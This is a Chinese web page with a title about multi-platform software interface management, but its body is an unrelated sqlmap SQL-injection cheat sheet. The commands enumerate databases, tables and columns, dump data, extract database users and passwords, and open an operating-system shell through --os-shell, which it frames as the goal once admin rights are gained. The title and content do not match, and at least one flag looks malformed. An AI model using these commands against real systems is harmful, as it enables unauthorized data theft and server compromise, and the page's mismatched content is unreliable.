多平台统一管理软件接口,如何实现多平台统一管理软件接口
286
2022-10-25
sqlmap命令
SQLMAP
GET 方式的注入 sqlmap.py -u "URL"
POST 方式的注入 sqlmap.py -u "URL" --data "POST参数=POST数值"
COOKIE 方式的注入 sqlmap.py -u "URL" --cookie "cookies 值"
爆数据库名(cookie根据实际的情况) sqlmap.py -u "URL" [--cookie "cookies 值"] --dbs
爆目标数据库中的表 sqlmap.py -u "URL" [--cookie "cookies 值"] -D 数据库名 --tables
爆目标数据表字段 sqlmap.py -u "URL" [--cookie "cookies 值"] -D 数据库名 -T 表名 --columns
导出目标字段的数据 sqlmap.py -u "URL" [--cookie "cookies 值"] -D 数据库名 -T 表名 -C 要导出数据的字段名,多个字段用逗号分隔 --dump
爆出目标库有多少数据 sqlmap.py -u "URL" [--cookie "cookies 值"] -D 数据库名 --count
检测当前用户 sqlmap.py -u "URL" [--cookie "cookies 值"] --current-user
检测当前用户是否管理员 sqlmap.py -u "URL" [--cookie "cookies 值"] --is-dba
检测数据库用户 sqlmap.py -u "URL" [--cookie "cookies 值"] --user -v 0
检测数据库用户密码 sqlmap.py -u "URL" [--cookie "cookies 值"] --password -v 0
检测当前数据库 sqlmap.py -u "URL" [--cookie "cookies 值"] --current-db
多线程 -threading 5
如果是管理员,我们可以写Shell
操作系统Shell写入
sqlmap.py -u "URL" [--cookie "cookies 值"] --os-shell
版权声明:本文内容由网络用户投稿,版权归原作者所有,本站不拥有其著作权,亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容,请联系我们jiasou666@gmail.com 处理,核实后本网站将在24小时内删除侵权内容。
发表评论
评论列表